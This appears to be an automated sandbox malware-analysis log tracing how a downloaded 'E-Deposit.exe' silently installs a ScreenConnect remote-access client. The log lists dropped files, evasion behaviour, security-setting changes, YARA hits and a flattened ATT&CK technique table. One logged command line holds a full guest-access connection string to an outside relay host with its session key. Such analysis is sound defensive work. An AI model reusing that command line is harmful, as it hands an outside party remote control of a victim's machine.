                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\E-Deposit.exeMemory allocated: 18E0000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\E-Deposit.exeMemory allocated: 3300000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\E-Deposit.exeMemory allocated: 5300000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\E-Deposit.exeMemory allocated: 6AA0000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\E-Deposit.exeMemory allocated: 6200000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\E-Deposit.exeMemory allocated: 7AA0000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\E-Deposit.exeMemory allocated: 8AA0000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\E-Deposit.exeMemory allocated: 6AA0000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\E-Deposit.exeMemory allocated: 8D30000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\E-Deposit.exeMemory allocated: 9D30000 memory reserve | memory write watch
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeMemory allocated: 19E0000 memory reserve | memory write watch
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeMemory allocated: 21D0000 memory reserve | memory write watch
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeMemory allocated: 1FE0000 memory reserve | memory write watch
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeMemory allocated: D60000 memory reserve | memory write watch
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeMemory allocated: 1AA50000 memory reserve | memory write watch
                      Source: C:\Windows\System32\svchost.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: C:\Users\user\Downloads\E-Deposit.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI6898.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI6898.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Client.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI6898.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI71C1.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI6898.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI6898.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Windows.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI6898.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                      Source: C:\Windows\System32\svchost.exe TID: 3032Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\Downloads\E-Deposit.exe TID: 3108Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe TID: 7460Thread sleep count: 38 > 30
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe TID: 7616Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                      Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\Windows\System32 FullSizeInformation
                      Source: C:\Users\user\Downloads\E-Deposit.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\Downloads\E-Deposit.exeProcess token adjusted: Debug
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Downloads\E-Deposit.exeMemory allocated: page read and write | page guard
                      Source: C:\Users\user\Downloads\E-Deposit.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi"
                      Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (484f9eed1d8e13b9)\screenconnect.clientservice.exe" "?e=access&y=guest&h=slplegalfinance.com&p=443&s=316b6739-92f5-44b7-a8b7-61cbbec9d115&k=bgiaaackaabsu0exaagaaaeaaqdvyezobln8wdm6xwdr4b0uasubfhp2ejosdzugmbruwvwehsuh2lvfcfwdygcjbhcbews%2fdmahacpw1tkv%2f%2bw18tijthn%2bq%2fezavwugchdfdkaqki0lnydddccsozul7%2bvqevv9snfahoisjld7xdnlpmsw%2bw682fijikr8xbdhppukmg4ksp6kf1xba7kkmnnwss1mrxckdb%2f1hqrui%2fszzdgbjvz3tc%2f3cr0lxlngeclg7dt5irihwzjf5xutinhipesoo6bsk%2bufoecyo3bjvu6prl6uky08mjz7e%2b6foqb4actm6qtr9k%2fsvfdvwq%2br7eykwxpsy6ith4x7%2f%2bv"
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Downloads\E-Deposit.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI6898.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI6898.tmp-\ScreenConnect.InstallerActions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI6898.tmp-\ScreenConnect.Core.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI6898.tmp-\ScreenConnect.Windows.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Core.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Windows.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Client.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Client.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Core.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Windows.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dll VolumeInformation
                      Source: C:\Users\user\Downloads\E-Deposit.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Lowering of HIPS / PFW / Operating System Security Settings

                      barindex
                      Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
                      Source: C:\Windows\System32\msiexec.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication Packages
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: Yara matchFile source: C:\Users\user\Downloads\Unconfirmed 367452.crdownload, type: DROPPED
                      Source: Yara matchFile source: 0000000E.00000002.1255943146.0000000005C50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000000.1289665825.00000000005B2000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1258853772.0000000007AA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000000.1231145401.0000000000636000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1247162256.0000000003301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: C:\Windows\Temp\~DFB71A7B35B829F0DC.TMP, type: DROPPED
                      Source: Yara matchFile source: C:\Windows\Temp\~DF9CBAF1865D94B65A.TMP, type: DROPPED
                      Source: Yara matchFile source: C:\Windows\Temp\~DF32625EBD992E86ED.TMP, type: DROPPED
                      Source: Yara matchFile source: C:\Config.Msi\506f30.rbs, type: DROPPED
                      Source: Yara matchFile source: C:\Windows\Installer\MSI71A0.tmp, type: DROPPED
                      Source: Yara matchFile source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe, type: DROPPED
                      Source: Yara matchFile source: 0000001B.00000002.1502008408.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire Infrastructure1
                      Replication Through Removable Media
                      1
                      Windows Management Instrumentation
                      1
                      Component Object Model Hijacking
                      1
                      Component Object Model Hijacking
                      22
                      Masquerading
                      OS Credential Dumping13
                      Security Software Discovery
                      Remote ServicesData from Local System2
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Command and Scripting Interpreter
                      2
                      Windows Service
                      2
                      Windows Service
                      21
                      Disable or Modify Tools
                      LSASS Memory1
                      Process Discovery
                      Remote Desktop ProtocolData from Removable Media1
                      Non-Application Layer Protocol
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAt1
                      Registry Run Keys / Startup Folder
                      11
                      Process Injection
                      51
                      Virtualization/Sandbox Evasion
                      Security Account Manager51
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin SharesData from Network Shared Drive2
                      Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCron1
                      DLL Side-Loading
                      1
                      Registry Run Keys / Startup Folder
                      11
                      Process Injection
                      NTDS11
                      Peripheral Device Discovery
                      Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                      DLL Side-Loading
                      1
                      Rundll32
                      LSA Secrets1
                      File and Directory Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      DLL Side-Loading
                      Cached Domain Credentials23
                      System Information Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      File Deletion
                      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
